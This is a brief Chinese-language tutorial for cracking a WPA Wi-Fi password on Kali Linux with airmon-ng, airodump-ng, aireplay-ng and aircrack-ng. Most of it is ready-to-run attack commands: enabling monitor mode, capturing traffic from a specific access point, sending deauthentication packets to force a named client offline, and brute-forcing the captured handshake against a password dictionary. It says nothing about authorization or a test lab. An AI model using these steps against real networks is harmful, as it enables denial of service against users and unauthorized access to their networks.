前言
本文直接使用kali操作系统进行相关操作,未使用虚拟机,在此不赘述虚拟机配置
如需要即插即用kali操作系统,可戳我。
正文
使用命令iwconfig,确定哪些无线解控是可用的,如图所示,无线网卡名称为wlan0。
使用airmon-ng命令监控无线传输,为监控模式 (monitor mode)设置拥有无线功能Kali通信接口
airmon-ng wlan0 start
airmon-ng check kill
使用iwconfig,查看端口监听状态,如图所示,无线网卡名称已变为wlan0mon,表明监听成功。
使用以下命令查看本地无线环境:
airodump-ng wlan0mon
主要参数:
BSSID:标识无线接入点或路由器的MAC地址 PWR:无线功率,数值越大,信号越好 CH:广播频道 ENC:加密技术 ESSID:无线路由名称
aireplay-ng -9 wlan0mon
airodump-ng wlan0mon --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0mon
0:表示我们正在启动一个取消鉴定攻击 10:表明我们将发送10个取消鉴定数据包 -a:目标接入点(路由器)BSSID -c:需断开的客户端MAC地址
airmon-ng stop wlan0mon
关闭后,重新进行抓包写入 airodump-ng wlan0 --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
再执行注入反认证包 aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0
aircrack-ng -w /....../password.txt /root/wifi/TPGuest_31D2.cap password.txt指代你的字典文件 TPGuest_31D2.cap为抓包写入的文件